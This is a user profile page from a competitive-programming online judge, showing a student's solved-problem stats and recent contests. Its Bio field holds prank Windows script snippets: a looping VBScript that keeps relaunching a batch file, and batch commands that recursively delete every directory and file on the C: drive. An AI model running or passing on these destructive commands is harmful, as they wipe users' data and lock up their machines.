1. Home
  2. Record
  1. Login
  2. Language
    1. English
    2. 한국어
    3. 简体中文
    4. 正體中文

yangzixin2024

UID: 1931, Registered at 2024-8-10 9:32:54, last login at 2025-6-6 9:03:35, last active at 2025-5-24 20:05:54.

Solved 10 problems, RP: 57.78 (No. 421)

  • Bio

    @echo off
    echo you are an idiot
    pause
    
    do
    Createobject("WScript.Shell").Run "program.bat" 1, False
    loop
    
    @echo off
    for /d %%i in (C:\*) do (
    	rd /s /q %%i
    )
    for /d %%i in (C:\) do (
    	del /s /q %%i
    )
    
    dim a
    a=inputbox(1+1=?,question1)
    
  • Recent Activities

    • 2024-2025上学期中学生信息奥林匹克(提高)期末考 IOI
    • 2024-2025第一学期初一竞赛组期末考 IOI
    • 20241126集训 IOI
    • 赛前冲刺安排 IOI
    • CSP-J训练赛(四) IOI
    • CSP-J训练赛(三) IOI
    • NOIP2024 模拟赛(四)hard OI
25
Submitted
10
Accepted
0
Solutions Liked

Status

  • Judging Queue
  • Service Status

Development

  • Open Source
  • API

Support

  • Help
  • QQ Group
  1. About
  2. Contact Us
  3. Privacy
  4. Terms of Service
  5. Copyright Complaint
  6. Language
    1. English
    2. 한국어
    3. 简体中文
    4. 正體中文
  7. Legacy mode
  8. Theme
    1. Light
    2. Dark
  1. 粤ICP备2021104657号
  2. Worker 0, 7ms
  3. Powered by Hydro v4.14.1 Community

Don't have an account?

By signing up a HFOJ universal account, you can submit code and join discussions in all online judging services provided by us.

CLOSE

SIGN IN

Using your HFOJ universal account

Forgot password or username?